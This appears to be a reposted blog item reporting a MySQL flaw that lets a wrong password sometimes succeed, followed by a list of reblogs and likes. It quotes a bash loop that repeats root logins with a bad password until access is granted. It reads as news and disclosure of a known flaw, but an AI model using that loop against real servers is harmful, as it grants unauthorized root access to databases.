A Tragically Comedic Security Flaw in MySQL
In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; doneDon’t try this at home. Or if you try it, don’t tell anyone the result.
Original title and link: A Tragically Comedic Security Flaw in MySQL (NoSQL database©myNoSQL)
21 Notes/ Hide
-
vgarrido ha rebloggato questo post da nosql
-
A asomisa è piaciuto
-
A fabbrikk è piaciuto
-
dursunkoc ha rebloggato questo post da nosql
-
kobebigs ha rebloggato questo post da nosql
-
A kobebigs è piaciuto
-
breathingfeelsnice ha rebloggato questo post da nosql e ha aggiunto:
que MySql que que?? jajaja
-
A breathingfeelsnice è piaciuto
-
emanuele88 ha rebloggato questo post da nosql
-
A jasonli-sysu è piaciuto
-
A dragoni è piaciuto
-
A experiencedjr è piaciuto
-
A zabotage è piaciuto
-
A roomthily è piaciuto
-
A ivogeorgiev è piaciuto
-
blackibiza ha rebloggato questo post da nosql
-
rshogus ha rebloggato questo post da nosql
-
janos-p-toth ha rebloggato questo post da nosql
-
A rshogus è piaciuto
-
A iadoreurmom è piaciuto
-
postato da nosql